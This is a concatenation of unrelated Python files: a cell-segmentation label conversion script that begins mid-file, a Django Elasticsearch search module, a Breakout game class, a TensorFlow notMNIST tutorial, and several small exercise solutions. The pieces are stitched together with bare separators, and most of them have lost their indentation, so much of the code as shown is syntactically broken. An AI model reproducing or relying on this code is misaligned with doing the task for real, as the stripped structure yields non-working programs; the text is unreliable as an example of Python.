"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop15_ERES008"
"/Cell2_Crop15_1170x1170x1170+5620-65+3857.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop15.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 16, 17, 18, 19, 35, 30])
# [0, er membrane, er lumen, ERES membrane, ERES lumen, cytosol, microtubules]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig, target, labels, mapping, min_ad, max_ad, specified_masks={"ribosomes": 0}
)
def main_multiscale_crop18(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop18_MVB"
"/Cell2_Crop18_1210x1210x1170+1405-305+3200.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop18.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 30, 35, 16, 17, 10, 11, 8, 9])
# [0, microtubules, cytosol, er membrane, er lumen, MVB membrane, MVB lumen, vesicle membrane, vesicle lumen]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig, target, labels, mapping, min_ad, max_ad, specified_masks={"ribosomes": 0}
)
def main_multiscale_crop19(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop19_BadLD"
"/Cell2_Crop19_1170x1170x1171+6390-110+4377.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop19.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 16, 17, 14, 15, 30, 8, 9, 35])
# [0, er membrane, er lumen, LD membrane, LD lumen, microtubules, vesicle membrane, vesicle lumen, cytosol]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig, target, labels, mapping, min_ad, max_ad, specified_masks={"ribosomes": 0}
)
def main_multiscale_crop20(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/SUM159_Cell2_Crop20_LD001"
"/Cell2_Crop20_1210x1210x1171+4200+240+4958.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop20.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 3, 4, 14, 15, 16, 17, 10, 11, 35])
# [0, mito membrane, mito lumen, LD membrane, LD lumen, er membrane, er lumen, MVB membrane, MVB lumen, cytosol]
min_ad = 172.0
max_ad = 233.0
main_multiscale(
orig, target, labels, mapping, min_ad, max_ad, specified_masks={"ribosomes": 0}
)
def main_multiscale_crop21(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/SUM159_Cell2_Crop21_LD002"
"/Cell2_Crop21_1170x1170x1171+4055+125+5018.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop21.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 3, 4, 16, 17, 14, 15, 35])
    # [0, mito membrane, mito lumen, er membrane, er lumen, LD membrane, LD lumen, cytosol]
min_ad = 172.0
max_ad = 233.0
main_multiscale(
orig, target, labels, mapping, min_ad, max_ad, specified_masks={"ribosomes": 0}
)
def main_multiscale_crop22(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/SUM159_Cell2_Crop22_LD003"
"/Cell2_Crop22_1180x1180x1170+3505-45+4845.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop22.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 35, 16, 17, 14, 15, 10, 11, 30])
# [0, cytosol, er membrane, er lumen, LD membrane, LD lumen, MVB membrane, MVB lumen, microtubules]
min_ad = 172.0
max_ad = 233.0
main_multiscale(
orig, target, labels, mapping, min_ad, max_ad, specified_masks={"ribosomes": 0}
)
def main_multiscale_crop4(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop4_Centrosome"
"/Cell2_Crop4_1310x1310x1248+5595-305+2232.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop4.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array(
[0, 20, 24, 10, 30, 28, 22, 23, 6, 35, 16, 7, 13, 11, 17, 21, 33, 32, 8, 9, 12]
)
# [0, NE membrane, HChrom , MVB membrane, microtubules, nucleoplasm, nuclear pore outside, nuclear pore inside,
# golgi membrane, cytosol, er membrane, golgi lumen, lysosome lumen, MVB lumen, er lumen, NE lumen,
    # subdistal appendages, distal appendages, vesicle membrane, vesicle lumen, lysosome membrane]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig,
target,
labels,
mapping,
min_ad,
max_ad,
specified_masks={
"ribosomes": 0,
"NHChrom": 1,
"EChrom": 0,
"NEChrom": 1,
"chromatin": 0,
"microtubules": "volumes/masks/microtubules",
},
)
def run_main_multiscale():
logging.basicConfig(level=logging.INFO)
labels = [
"ecs",
"plasma_membrane",
"mito_membrane",
"mito",
"mito_DNA",
"golgi_membrane",
"golgi",
"vesicle_membrane",
"vesicle",
"MVB_membrane",
"MVB",
"lysosome_membrane",
"lysosome",
"LD_membrane",
"LD",
"er_membrane",
"er",
"ERES",
"NE",
"nuclear_pore",
"nuclear_pore_in",
"chromatin",
"NHChrom",
"EChrom",
"NEChrom",
"nucleus",
"nucleolus",
"microtubules",
"centrosome",
"distal_app",
"subdistal_app",
"ribosomes",
]
offset = "o505x505x505_m1170x1170x1170"
# main_multiscale_crop1(labels, offset)
main_multiscale_crop7(labels, offset)
# main_multiscale_crop14(labels, offset)
# main_multiscale_crop22(labels, offset)
# main_multiscale_crop8(labels, offset)
# main_multiscale_crop19(labels, offset)
# main_multiscale_crop9(labels, offset)
# main_multiscale_crop13(labels, offset)
# main_multiscale_crop15(labels, offset)
# main_multiscale_crop18(labels, offset)
# main_multiscale_crop20(labels, offset)
# main_multiscale_crop21(labels, offset)
# main_multiscale_crop3(labels, offset)
# main_multiscale_crop4(labels, offset)
# main_multiscale_crop6(labels, offset)
def run_main():
logging.basicConfig(level=logging.INFO)
main_cell2_crop1()
main_cell2_crop3()
main_cell2_crop6()
main_cell2_crop7()
main_cell2_crop8()
main_cell2_crop9()
main_cell2_crop13()
main_cell2_crop14()
main_cell2_crop15()
main_cell2_crop18()
main_cell2_crop19()
main_cell2_crop20()
main_cell2_crop21()
main_cell2_crop22()
if __name__ == "__main__":
run_main_multiscale()
|
import json
from contextlib import contextmanager
from django.conf import settings
from elasticsearch import Elasticsearch
from elasticsearch.exceptions import NotFoundError, RequestError, ConnectionError
from elasticsearch.helpers import bulk
DOCTYPE = 'doc'
ES_TIMEOUT = '100s'
ES_REQUEST_TIMEOUT = 100
ES_BATCH_REQUEST_TIMEOUT = 120
ENT_FIELDS = [
'entity',
'entity-type.location',
'entity-type.organization',
'entity-type.event',
'entity-type.person',
'entity-type.money',
]
ALL_FIELDS = [
'attachments',
'broken',
'content-type',
'date',
'date-created',
'email-domains',
'filename',
'filetype',
'from',
'id',
'sha3-256',
'in-reply-to',
'lang',
'location',
'md5',
'message',
'message-id',
'ocr',
'ocrimage',
'ocrpdf',
'ocrtext.*',
'path',
'path-parts',
'path-text',
'pgp',
'references',
'rev',
'sha1',
'size',
'subject',
'tags',
'text',
'thread-index',
'to',
'word-count',
'translated-from',
'translated-to',
"is-table",
"table-columns",
"table-sheets",
"table-sheet-count",
"table-row-count",
"table-col-count",
'skipped',
] + ENT_FIELDS
PRIVATE_TAGS_FIELD_PREFIX = "priv-tags."
INT_FIELDS = [
'size',
'word-count',
"table-sheet-count",
"table-row-count",
"table-col-count",
]
DATE_FIELDS = [
'date',
'date-created',
]
BOOL_FIELDS = [
'attachments',
'ocr',
'ocrimage',
'ocrpdf',
'pgp',
'has-thumbnails',
'has-pdf-preview',
"is-table",
"skipped",
]
TERM_OR_FIELDS = [
'email-domains',
'filetype',
'content-type',
'from',
'lang',
'thread-index',
'to',
'detected-objects.object.keyword',
'image-classes.class.keyword',
'translated-from',
'translated-to',
"table-columns",
"table-sheets",
] + [x + '.keyword' for x in ENT_FIELDS]
TERM_AND_FIELDS = [
'tags',
]
SOURCE_FIELDS = [
'path',
'filename',
'url',
]
def get_fields(user_uuid):
assert user_uuid
private_tags_field = PRIVATE_TAGS_FIELD_PREFIX + user_uuid
SOURCE = SOURCE_FIELDS + INT_FIELDS \
+ DATE_FIELDS + BOOL_FIELDS + TERM_OR_FIELDS \
+ TERM_AND_FIELDS + [private_tags_field]
return {
'all': ALL_FIELDS + [private_tags_field],
'bool': BOOL_FIELDS,
'int': INT_FIELDS,
'date': DATE_FIELDS,
'term_or': TERM_OR_FIELDS,
'term_and': TERM_AND_FIELDS + [private_tags_field],
'highlight': ALL_FIELDS + [private_tags_field],
'_source': SOURCE,
}
class SearchError(Exception):
def __init__(self, reason):
self.reason = reason
@contextmanager
def elasticsearch():
try:
yield Elasticsearch(settings.HOOVER_ELASTICSEARCH_URL)
except ConnectionError:
raise SearchError('Could not connect to Elasticsearch.')
except RequestError as e:
reason = 'reason unknown'
try:
if e.info:
reason = e.info['error']['root_cause'][0]['reason']
except LookupError:
pass
raise SearchError('Elasticsearch failed: ' + reason)
def create_index(collection_id, name):
with elasticsearch() as es:
es.indices.create(index=_index_name(collection_id))
def _index_name(collection_id):
from .models import Collection
return Collection.objects.get(id=collection_id).index
def _index_id(index):
from .models import Collection
return Collection.objects.get(index=index).id
def index(collection_id, doc_id, body):
with elasticsearch() as es:
es.index(
index=_index_name(collection_id),
doc_type=DOCTYPE,
id=doc_id,
body=body,
)
def bulk_index(collection_id, docs):
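    # Wrap each (id, data) pair in a bulk 'index' action targeting this collection's index;
    # the bulk() helper then sends the actions to Elasticsearch in chunks.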
def index(id, data):
return dict(
data,
_op_type='index',
_index=_index_name(collection_id),
_type=DOCTYPE,
_id=id,
)
with elasticsearch() as es:
_, err = bulk(
es,
(index(id, data) for id, data in docs),
stats_only=True,
request_timeout=ES_REQUEST_TIMEOUT,
)
if err:
raise RuntimeError("Bulk indexing failed on %d documents" % err)
def versions(collection_id, doc_id_list):
with elasticsearch() as es:
res = es.search(
index=_index_name(collection_id),
body={
'size': len(doc_id_list),
'query': {'ids': {'values': doc_id_list}},
'fields': ['_hoover.version'],
},
allow_partial_search_results=False,
timeout=ES_TIMEOUT,
request_timeout=ES_REQUEST_TIMEOUT,
)
hits = res['hits']['hits']
assert len(hits) == res['hits']['total']
return {
hit['_id']: hit['fields'].get('_hoover.version', [None])[0]
for hit in hits
}
def get(collection_id, doc_id):
with elasticsearch() as es:
return es.get(
index=_index_name(collection_id),
doc_type=DOCTYPE,
id=doc_id,
)
def _get_indices(collections):
from .models import Collection
indices = ','.join(
c.index for c in
Collection.objects.filter(name__in=collections)
)
return indices
def batch_count(query_strings, collections, aggs=None):
def _build_query_lines(query_string, meta={}, aggs=None):
query_body = {
"query": {
"query_string": {
"query": query_string,
"default_operator": "AND",
}
},
"size": 0
}
if aggs:
query_body['aggs'] = aggs
return json.dumps(meta) + "\n" + json.dumps(query_body) + "\n"
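    # The msearch body is newline-delimited JSON: one header line (here the empty meta dict)
    # followed by one query line per search, e.g. for a single query string "foo":
    #   {}
    #   {"query": {"query_string": {"query": "foo", "default_operator": "AND"}}, "size": 0}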
indices = _get_indices(collections)
body = "".join(
_build_query_lines(q, {}, aggs)
for q in query_strings
)
with elasticsearch() as es:
rv = es.msearch(
index=indices,
body=body,
doc_type=DOCTYPE,
request_timeout=ES_BATCH_REQUEST_TIMEOUT,
max_concurrent_searches=settings.ES_BATCH_MAX_CONCURRENT_SEARCHES,
)
for query_string, response in zip(query_strings, rv.get('responses', [])):
response['_query_string'] = query_string
return rv
def search(query, _source, highlight, collections, from_, size, sort, aggs, post_filter, search_after):
indices = _get_indices(collections)
if not indices:
# if index='', elasticsearch will search in all indices, so we make
# sure to return an empty result set
empty_query = {'query': {'bool': {'must_not': {'match_all': {}}}}}
with elasticsearch() as es:
return (es.search(body=empty_query), {})
body = {
'from': from_,
'size': size,
'query': query,
'sort': sort,
'aggs': dict(aggs, **{
'count_by_index': {
'terms': {
'field': '_index',
'size': len(indices)
},
},
}),
}
if _source:
body['_source'] = _source
if post_filter:
body['post_filter'] = post_filter
if search_after and len(search_after) > 0:
body['search_after'] = search_after
# remove 'from' when 'search_after' is present
if 'from' in body:
del body['from']
if highlight:
body['highlight'] = highlight
with elasticsearch() as es:
rv = es.search(
index=indices,
ignore_unavailable=True,
allow_partial_search_results=False,
request_cache=True,
batched_reduce_size=settings.ES_BATCHED_REDUCE_SIZE,
max_concurrent_shard_requests=settings.ES_MAX_CONCURRENT_SHARD_REQUESTS,
timeout=ES_TIMEOUT,
request_timeout=ES_REQUEST_TIMEOUT,
body=body,
)
aggs = (
rv
.get('aggregations', {})
.get('count_by_index', {})
.get('buckets', [])
)
count_by_index = {
_index_id(b['key']): b['doc_count']
for b in aggs
}
return (rv, count_by_index)
def delete_index(collection_id, ok_missing=False):
with elasticsearch() as es:
es.indices.delete(
index=_index_name(collection_id),
ignore=[404] if ok_missing else [],
)
def delete_all():
with elasticsearch() as es:
for index in es.indices.get(index='*'):
if index.startswith(settings.ELASTICSEARCH_INDEX_PREFIX):
es.indices.delete(index=index)
def refresh():
with elasticsearch() as es:
es.indices.refresh()
def count(collection_id):
with elasticsearch() as es:
try:
return es.count(index=_index_name(collection_id))['count']
except NotFoundError:
return None
def aliases(collection_id):
with elasticsearch() as es:
name = _index_name(collection_id)
alias_map = es.indices.get_aliases(index=name)
return set(alias_map.get(name, {}).get('aliases', {}))
def create_alias(collection_id, name):
index = _index_name(collection_id)
with elasticsearch() as es:
try:
es.indices.put_alias(index=index, name=name)
except NotFoundError:
es.indices.create(index=index)
es.indices.put_alias(index=index, name=name)
def delete_aliases(collection_id):
with elasticsearch() as es:
es.indices.delete_alias(index=_index_name(collection_id), name='*')
def set_mapping(collection_id, properties):
with elasticsearch() as es:
es.indices.put_mapping(
index=_index_name(collection_id),
doc_type=DOCTYPE,
body={'properties': properties},
)
def status():
with elasticsearch() as es:
return {
index: {
'aliases': list(amap['aliases']),
'documents': es.count(index=index)['count'],
}
for index, amap in es.indices.get_aliases().items()
}
def list_indices():
with elasticsearch() as es:
for index in es.indices.get(index='*'):
if index.startswith(settings.ELASTICSEARCH_INDEX_PREFIX):
suffix = index[len(settings.ELASTICSEARCH_INDEX_PREFIX):]
try:
collection_id = int(suffix)
except ValueError:
continue
yield collection_id
|
"""
Solve the equation (a*x + b) / (c*x + d) = 0 over the integers.
Input format
Four numbers are given: a, b, c, d; c and d are not both zero.
Output format
Print all solutions if there are finitely many of them, "NO" (without quotes) if there are no solutions,
and "INF" (without quotes) if there are infinitely many solutions.
"""
a, b, c, d = int(input()), int(input()), int(input()), int(input())
if a == 0 and b == 0:
print("INF")
elif a == 0 or a * d == b * c:
print("NO")
elif b // a * a == b:
print(-b // a)
else:
print("NO")
|
"""
stanCode Breakout Project
Adapted from Eric Roberts's Breakout by
Sonja Johnson-Yu, Kylie Jue, Nick Bowman,
and Jerry Liao
Name: Kevin Chen
"""
from campy.graphics.gwindow import GWindow
from campy.graphics.gobjects import GOval, GRect, GLabel
from campy.gui.events.mouse import onmouseclicked, onmousemoved
from campy.gui.events.timer import pause
import random
BRICK_SPACING = 5 # Space between bricks (in pixels). This space is used for horizontal and vertical spacing.
BRICK_WIDTH = 40       # Width of a brick (in pixels).
BRICK_HEIGHT = 15 # Height of a brick (in pixels).
BRICK_ROWS = 10 # Number of rows of bricks.
BRICK_COLS = 10 # Number of columns of bricks.
BRICK_OFFSET = 50 # Vertical offset of the topmost brick from the window top (in pixels).
BALL_RADIUS = 10 # Radius of the ball (in pixels).
PADDLE_WIDTH = 75 # Width of the paddle (in pixels).
PADDLE_HEIGHT = 15 # Height of the paddle (in pixels).
PADDLE_OFFSET = 50 # Vertical offset of the paddle from the window bottom (in pixels).
INITIAL_Y_SPEED = 7 # Initial vertical speed for the ball.
MAX_X_SPEED = 5 # Maximum initial horizontal speed for the ball.
class BreakoutGraphics:
# Constructor
def __init__(self, ball_radius=BALL_RADIUS, paddle_width=PADDLE_WIDTH,
paddle_height=PADDLE_HEIGHT, paddle_offset=PADDLE_OFFSET,
brick_rows=BRICK_ROWS, brick_cols=BRICK_COLS,
brick_width=BRICK_WIDTH, brick_height=BRICK_HEIGHT,
brick_offset=BRICK_OFFSET, brick_spacing=BRICK_SPACING,
title='Breakout'):
# Create a graphical window, with some extra space
window_width = brick_cols * (brick_width + brick_spacing) - brick_spacing
window_height = brick_offset + 3 * (brick_rows * (brick_height + brick_spacing) - brick_spacing)
self.window = GWindow(width=window_width, height=window_height, title=title)
# Play pilot animation
self.pilot()
# After the pilot, start the game
# Create a paddle
self.paddle_offset = paddle_offset
self.paddle = GRect(paddle_width, paddle_height)
self.paddle.filled = True
self.paddle.fill_color = 'black'
self.paddle.color = 'black'
self.window.add(self.paddle, x=(self.window.width - self.paddle.width) / 2,
y=(self.window.height - paddle_offset))
# Draw bricks
self.brick_width = brick_width
self.brick_height = brick_height
self.brick_offset = brick_offset
self.brick_spacing = brick_spacing
self.brick_rows = brick_rows
self.brick_cols = brick_cols
for i in range(self.brick_rows):
for j in range(self.brick_cols):
self.brick = GRect(brick_width, brick_height)
self.brick.filled = True
if i // 2 == 0:
self.brick.fill_color = 'salmon'
self.brick.color = 'salmon'
elif i // 2 == 1:
self.brick.fill_color = 'gold'
self.brick.color = 'gold'
elif i // 2 == 2:
self.brick.fill_color = 'lightskyblue'
self.brick.color = 'lightskyblue'
elif i // 2 == 3:
self.brick.fill_color = 'cornflowerblue'
self.brick.color = 'cornflowerblue'
else:
self.brick.fill_color = 'royalblue'
self.brick.color = 'royalblue'
self.window.add(self.brick, x=(j * (brick_width + brick_spacing)),
y=(brick_offset + i * (brick_height + brick_spacing)))
# Center a filled ball in the graphical window
self.radius = ball_radius
self.ball = GOval(self.radius * 2, self.radius * 2)
self.ball.filled = True
self.ball.fill_color = 'black'
self.ball.color = 'black'
self.window.add(self.ball, x=(self.window.width - self.ball.width) / 2,
y=(self.window.height - self.ball.height) / 2)
# Default initial velocity for the ball
self.__dx = 0
self.__dy = 0
# Initialize our mouse listeners
onmouseclicked(self.starter)
onmousemoved(self.paddle_control)
self.mouse_switch = True
# Show the score board
self.__score = 0
self.score_board = GLabel('Score: ' + str(self.__score))
self.score_board.font = 'Courier-10'
self.window.add(self.score_board, 0, 20)
# Methods in this class
# Paddle controller
def paddle_control(self, m):
self.paddle.x = m.x - self.paddle.width / 2
if self.paddle.x <= 0:
self.paddle.x = 0
elif self.paddle.x + self.paddle.width >= self.window.width:
self.paddle.x = self.window.width - self.paddle.width
# Reset the ball to the initial position
def reset_ball(self):
self.__dx = 0
self.__dy = 0
self.ball.fill_color = 'black'
self.ball.color = 'black'
self.window.add(self.ball, x=(self.window.width - self.ball.width) / 2,
y=(self.window.height - self.ball.height) / 2)
self.mouse_switch = True
# Give the ball initial speed to start
def set_initial_velocity(self):
self.__dx = random.randint(1, MAX_X_SPEED)
self.__dy = INITIAL_Y_SPEED
if random.random() > 0.5:
self.__dx *= -1
# V(x) getter
def get_vx(self):
return self.__dx
# V(y) getter
def get_vy(self):
return self.__dy
# V(x) setter
def set_vx(self, new_vx):
self.__dx = new_vx
# V(y) setter
def set_vy(self, new_vy):
self.__dy = new_vy
# Score getter
def get_score(self):
return self.__score
# Score setter
def set_score(self, add_score):
self.__score += add_score
# Function for starting the game (used for onmouseclicked)
def starter(self, m):
if self.mouse_switch is True:
self.set_initial_velocity()
self.mouse_switch = False
    # Method for detecting whether the ball hit an object
def is_ball_collision(self):
for i in range(2):
for j in range(2):
ball_x = self.ball.x + 2 * i * self.radius
ball_y = self.ball.y + 2 * j * self.radius
maybe_object = self.window.get_object_at(ball_x, ball_y)
if maybe_object is not None:
return maybe_object
    # Method for detecting whether any bricks remain
def there_is_no_brick(self):
for i in range(BRICK_ROWS):
for j in range(BRICK_COLS):
maybe_brick = self.window.get_object_at(x=(j * (self.brick_width + self.brick_spacing)),
y=(self.brick_offset + i * (self.brick_height +
self.brick_spacing)))
if maybe_brick is not None:
return False
return True
    # Method for removing all the objects from the window
def remove_all(self):
for i in range(self.brick_rows):
for j in range(self.brick_cols):
maybe_object = self.window.get_object_at(x=(j * (self.brick_width + self.brick_spacing)),
y=(self.brick_offset + i * (self.brick_height
+ self.brick_spacing)))
if maybe_object is not None:
self.window.remove(maybe_object)
self.window.remove(self.paddle)
# Method for game over (no lives left)
def game_over(self):
game_over = GLabel('Game Over')
game_over.color = 'tomato'
game_over.font = 'Courier-30-bold'
self.window.add(game_over, x=(self.window.width - game_over.width) / 2, y=self.window.height / 2)
    # Method for the winning (congratulations) message
def congrats(self):
label_win = GLabel('Congratulations!')
label_win.color = 'navy'
label_win.font = 'Courier-30-bold'
self.window.add(label_win, x=(self.window.width - label_win.width) / 2, y=self.window.height / 2)
# Method for final score display
def show_score(self, score):
score_label = GLabel('Your Final Score: ' + str(score))
score_label.font = 'Courier-15'
self.window.add(score_label, x=(self.window.width - score_label.width) / 2, y=self.window.height / 2 + 60)
# Method for updating the score during the game
def score_board_update(self, score):
self.score_board.text = 'Score: ' + str(score)
# Method for the pilot animation
def pilot(self):
# Instructions
line_1 = GLabel('Welcome to my Breakout Game!')
line_1.font = 'Courier-12-bold'
line_2 = GLabel('Your mission is to get the highest score.')
line_2.font = 'Courier-12-bold'
line_3 = GLabel('No matter how you get it >.^')
line_3.font = 'Courier-12-bold'
self.window.add(line_1, x=(self.window.width - line_1.width) / 2, y=self.window.height - 40)
self.window.add(line_2, x=(self.window.width - line_2.width) / 2, y=self.window.height - 20)
self.window.add(line_3, x=(self.window.width - line_3.width) / 2, y=self.window.height)
# Animation
while True:
# Update
line_1.move(0, -5)
line_2.move(0, -5)
line_3.move(0, -5)
# Check
if line_1.y <= self.window.height / 2:
break
# Pause
pause(100)
pause(1000)
self.window.remove(line_1)
self.window.remove(line_2)
self.window.remove(line_3)
pause(1000)
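# Illustrative sketch only: the real game loop lives in a separate breakout.py in the
# stanCode starter files. FRAME_RATE and the simplified wall-bounce rules below are
# assumptions for demonstration, not part of this module.
FRAME_RATE = 1000 / 120  # pause between frames, in milliseconds
def demo_main():
    graphics = BreakoutGraphics()
    while True:
        pause(FRAME_RATE)
        dx = graphics.get_vx()
        dy = graphics.get_vy()
        graphics.ball.move(dx, dy)
        # Bounce off the side and top walls by flipping the velocity components.
        if graphics.ball.x <= 0 or graphics.ball.x + graphics.ball.width >= graphics.window.width:
            graphics.set_vx(-dx)
        if graphics.ball.y <= 0:
            graphics.set_vy(-dy)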
|
def palindrome_pairs(words):
    # Collect index pairs (i, j) where words[j] is the reverse of words[i].
    answer = []
    for i, x in enumerate(words):
        if x[::-1] in words:
            j = words.index(x[::-1])
            if i != j:
                answer.append((i, j))
    # Deduplicate mirrored pairs such as (0, 2) and (2, 0).
    pairs = set((a, b) if a <= b else (b, a) for a, b in answer)
    if len(pairs) > 0:
        return pairs
    else:
        return False
z = ['ii', ' ', '21']
print(palindrome_pairs(z))
dictionary = {'all','and','mom'} |
from floodsystem.stationdata import build_station_list
from floodsystem.geo import rivers_by_station_number
stations = build_station_list()
print("\n"+str(rivers_by_station_number(stations,9))+"\n")
|
"""
A robot is located at the top-left corner of an m x n grid (the starting point is marked "Start" in the diagram).
The robot can only move either down or right at any point in time, and it is trying to reach the bottom-right corner of the grid (marked "Finish").
Now consider that the grid contains obstacles. How many unique paths from the top-left corner to the bottom-right corner are there?
An obstacle and an empty cell are marked as 1 and 0 respectively in the grid.
Note: the values of m and n do not exceed 100.
Example 1:
Input:
[
  [0,0,0],
  [0,1,0],
  [0,0,0]
]
Output: 2
Explanation:
There is one obstacle in the middle of the 3x3 grid.
There are 2 unique paths from the top-left corner to the bottom-right corner:
1. Right -> Right -> Down -> Down
2. Down -> Down -> Right -> Right
Source: LeetCode (leetcode-cn)
Link: https://leetcode-cn.com/problems/unique-paths-ii
The copyright belongs to LeetCode. Commercial reprints require official authorization; non-commercial reprints must cite the source.
"""
from typing import List
class Solution:
    def uniquePathsWithObstacles(self, obstacleGrid: List[List[int]]) -> int:
        # Rolling 1-D dynamic programming: dp[j] is the number of paths that
        # reach the current row's cell in column j.
        if not obstacleGrid or not obstacleGrid[0] or obstacleGrid[0][0] == 1:
            return 0
        cols = len(obstacleGrid[0])
        dp = [0] * cols
        dp[0] = 1
        for row in obstacleGrid:
            for j in range(cols):
                if row[j] == 1:
                    dp[j] = 0  # an obstacle blocks every path through this cell
                elif j > 0:
                    dp[j] += dp[j - 1]  # paths from above plus paths from the left
        return dp[-1] |
from __future__ import print_function
import numpy as np
import tensorflow as tf
from six.moves import cPickle as pickle
from six.moves import range
pickle_file = 'notMNIST.pickle'
with open(pickle_file, 'rb') as f:
save = pickle.load(f)
train_dataset = save['train_dataset']
train_labels = save['train_labels']
valid_dataset = save['valid_dataset']
valid_labels = save['valid_labels']
test_dataset = save['test_dataset']
test_labels = save['test_labels']
del save
print('Training set', train_dataset.shape, train_labels.shape)
print('Validation set', valid_dataset.shape, valid_labels.shape)
print('Test set', test_dataset.shape, test_labels.shape)
image_size = 28
num_labels = 10
def reformat(dataset,labels):
dataset = dataset.reshape((-1,image_size*image_size)).astype(np.float32)
labels = (np.arange(num_labels) == labels[:,None]).astype(np.float32)
return dataset, labels
train_dataset,train_labels = reformat(train_dataset,train_labels)
valid_dataset,valid_labels = reformat(valid_dataset,valid_labels)
test_dataset,test_labels = reformat(test_dataset,test_labels)
print('Training set',train_dataset.shape,train_labels.shape)
print('Validation set',valid_dataset.shape,valid_labels.shape)
print('Test set',test_dataset.shape,test_labels.shape)
train_subset = 10000
graph = tf.Graph()
with graph.as_default():
tf_train_dataset = tf.constant(train_dataset[:train_subset,:])
tf_train_labels = tf.constant(train_labels[:train_subset])
tf_valid_dataset = tf.constant(valid_dataset)
tf_test_dataset = tf.constant(test_dataset)
weights = tf.Variable(
tf.truncated_normal([image_size*image_size,num_labels]))
biases = tf.Variable(tf.zeros([num_labels]))
logits = tf.matmul(tf_train_dataset,weights) + biases
loss = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(labels = tf_train_labels,logits = logits ))
optimizer = tf.train.GradientDescentOptimizer(0.5).minimize(loss)
train_prediction = tf.nn.softmax(logits)
valid_prediction = tf.nn.softmax(
tf.matmul(tf_valid_dataset, weights) + biases)
test_prediction = tf.nn.softmax(tf.matmul(tf_test_dataset,weights) + biases)
num_steps = 3001
def accuracy(predictions, labels):
return (100.0 * np.sum(np.argmax(predictions, 1) == np.argmax(labels, 1))
/ predictions.shape[0])
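# For example (illustrative values): with predictions [[0.9, 0.1], [0.2, 0.8]] and
# one-hot labels [[1, 0], [0, 1]], both row-wise argmaxes match, so accuracy(...)
# returns 100.0.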
with tf.Session(graph=graph) as session:
# This is a one-time operation which ensures the parameters get initialized as
# we described in the graph: random weights for the matrix, zeros for the
# biases.
tf.global_variables_initializer().run()
print('Initialized')
for step in range(num_steps):
# Run the computations. We tell .run() that we want to run the optimizer,
# and get the loss value and the training predictions returned as numpy
# arrays.
_, l, predictions = session.run([optimizer, loss, train_prediction])
if (step % 100 == 0):
print('Loss at step %d: %f' % (step, l))
print('Training accuracy: %.1f%%' % accuracy(
predictions, train_labels[:train_subset, :]))
# Calling .eval() on valid_prediction is basically like calling run(), but
# just to get that one numpy array. Note that it recomputes all its graph
# dependencies.
print('Validation accuracy: %.1f%%' % accuracy(valid_prediction.eval(), valid_labels))
print('Test accuracy: %.1f%%' % accuracy(test_prediction.eval(), test_labels))
batch_size = 128
graph = tf.Graph()
with graph.as_default():
# Input data. For the training data, we use a placeholder that will be fed
# at run time with a training minibatch.
tf_train_dataset = tf.placeholder(tf.float32,
shape=(batch_size, image_size * image_size))
tf_train_labels = tf.placeholder(tf.float32, shape=(batch_size, num_labels))
tf_valid_dataset = tf.constant(valid_dataset)
tf_test_dataset = tf.constant(test_dataset)
# Variables.
weights = tf.Variable(
tf.truncated_normal([image_size * image_size, num_labels]))
biases = tf.Variable(tf.zeros([num_labels]))
# Training computation.
logits = tf.matmul(tf_train_dataset, weights) + biases
loss = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(labels=tf_train_labels, logits=logits))
# Optimizer.
optimizer = tf.train.GradientDescentOptimizer(0.5).minimize(loss)
# Predictions for the training, validation, and test data.
train_prediction = tf.nn.softmax(logits)
valid_prediction = tf.nn.softmax(
tf.matmul(tf_valid_dataset, weights) + biases)
test_prediction = tf.nn.softmax(tf.matmul(tf_test_dataset, weights) + biases)
num_steps = 5001
with tf.Session(graph=graph) as session:
tf.global_variables_initializer().run()
print("Initialized")
for step in range(num_steps):
# Pick an offset within the training data, which has been randomized.
# Note: we could use better randomization across epochs.
offset = (step * batch_size) % (train_labels.shape[0] - batch_size)
# Generate a minibatch.
batch_data = train_dataset[offset:(offset + batch_size), :]
batch_labels = train_labels[offset:(offset + batch_size), :]
# Prepare a dictionary telling the session where to feed the minibatch.
# The key of the dictionary is the placeholder node of the graph to be fed,
# and the value is the numpy array to feed to it.
feed_dict = {tf_train_dataset : batch_data, tf_train_labels : batch_labels}
_, l, predictions = session.run(
[optimizer, loss, train_prediction], feed_dict=feed_dict)
